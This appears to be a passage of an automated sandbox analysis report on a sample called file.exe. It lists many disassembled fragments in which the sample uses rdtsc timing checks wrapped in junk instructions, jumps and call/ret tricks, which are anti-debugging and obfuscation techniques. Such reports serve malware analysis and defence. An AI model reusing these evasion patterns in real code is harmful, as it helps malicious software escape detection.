                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24B7F second address: F24B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25BBF second address: F25BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AD900F596h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25BCA second address: F25C64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F2AD9523876h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnl 00007F2AD952387Eh 0x00000013 nop 0x00000014 jc 00007F2AD9523879h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 add ebx, 76A0E87Eh 0x00000027 mov di, C4C2h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F2AD9523878h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov eax, dword ptr [ebp+122D10C9h] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F2AD9523878h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F2AD9523881h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25C64 second address: F25C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F59Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A283 second address: F2A29F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2AD952387Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B21C second address: F2B222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C451 second address: F2C457 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C457 second address: F2C45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C45D second address: F2C461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E401 second address: F2E405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2D539 second address: F2D5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F2AD9523878h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 or ebx, 2BC60C52h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov ebx, 297A46EBh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov bx, D27Eh 0x0000003e mov eax, dword ptr [ebp+122D0579h] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F2AD9523878h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, dword ptr [ebp+122D349Dh] 0x00000064 push FFFFFFFFh 0x00000066 mov edi, dword ptr [ebp+12476112h] 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jnp 00007F2AD952388Bh 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E405 second address: F2E40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2D5CD second address: F2D5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD952387Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E40B second address: F2E411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2D5DD second address: F2D5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E5F6 second address: F2E5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F313B5 second address: F313CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2AD952387Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F313CB second address: F31407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F59Eh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F2AD900F596h 0x00000013 popad 0x00000014 push ecx 0x00000015 jl 00007F2AD900F596h 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jo 00007F2AD900F59Eh 0x00000024 pushad 0x00000025 popad 0x00000026 je 00007F2AD900F596h 0x0000002c pushad 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f push edx 0x00000030 pop edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED656F second address: ED6579 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AD9523882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6579 second address: ED657F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED657F second address: ED6587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6587 second address: ED658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED658D second address: ED6591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6591 second address: ED65BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2AD900F5A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2AD900F59Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31A5C second address: F31ACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F2AD9523878h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F2AD952387Ch 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D2E51h] 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D181Dh], ecx 0x0000003b jne 00007F2AD9523882h 0x00000041 push eax 0x00000042 pushad 0x00000043 pushad 0x00000044 jne 00007F2AD9523876h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F32AA7 second address: F32AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F32C32 second address: F32C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F32C36 second address: F32C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2AD900F596h 0x00000009 jmp 00007F2AD900F59Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F2AD900F59Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F32C63 second address: F32C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35D2B second address: F35D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F2AD900F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35D3A second address: F35D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35D4B second address: F35D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F35D51 second address: F35D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F364A2 second address: F364A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F37461 second address: F37465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F365F6 second address: F365FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F37465 second address: F3746E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F36732 second address: F36737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F385EE second address: F385F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F376A7 second address: F376AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F385F2 second address: F38604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F2AD9523878h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F409EA second address: F409EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F409EF second address: F409FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2AD9523876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F403AB second address: F403CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F5A0h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F2AD900F596h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40568 second address: F40582 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD9523876h 0x00000008 jbe 00007F2AD9523876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F2AD9523876h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40582 second address: F405BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A7h 0x00000007 jmp 00007F2AD900F5A7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F405BB second address: F405C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F405C4 second address: F405DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F5A5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F405DF second address: F405E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F405E5 second address: F405EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44916 second address: F4494A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F2AD9523887h 0x0000000b jmp 00007F2AD9523882h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4494A second address: F4494E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4494E second address: F44961 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2AD9523878h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1557 second address: ED1563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46370 second address: F46376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46376 second address: F4637C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4637C second address: F46380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46380 second address: F46384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46384 second address: F4639F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2AD9523883h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46EA3 second address: F46EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46EAA second address: F46EAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47016 second address: F4701C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4701C second address: F47022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47022 second address: F47026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47026 second address: F47034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9B3 second address: F4D9BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2AD900F596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9BF second address: F4D9CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F2AD9523876h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9CC second address: F4D9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9D4 second address: F4D9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCEB9 second address: EDCEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCEBD second address: EDCEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCEC1 second address: EDCECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AD900F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCECD second address: EDCED2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C7A6 second address: F4C7BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2AD900F59Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C7BA second address: F4C7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CD25 second address: F4CD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CD29 second address: F4CD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2AD9523887h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CD49 second address: F4CD4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CEA0 second address: F4CECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F2AD9523880h 0x0000000f pop esi 0x00000010 jmp 00007F2AD9523882h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D2C7 second address: F4D2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F521BE second address: F521C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F521C4 second address: F521C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F521C9 second address: F521D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52659 second address: F5265D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5265D second address: F52663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52663 second address: F52669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52669 second address: F52680 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2AD9523882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F527F2 second address: F5281F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2AD900F59Eh 0x0000000d jmp 00007F2AD900F5A7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5BD55 second address: F5BD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C212 second address: F5C239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2AD900F5A1h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C239 second address: F5C240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C240 second address: F5C246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C246 second address: F5C250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C3B3 second address: F5C3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F5A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F2AD900F596h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C3D7 second address: F5C411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523886h 0x00000007 jmp 00007F2AD9523885h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 ja 00007F2AD9523876h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C550 second address: F5C556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C556 second address: F5C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
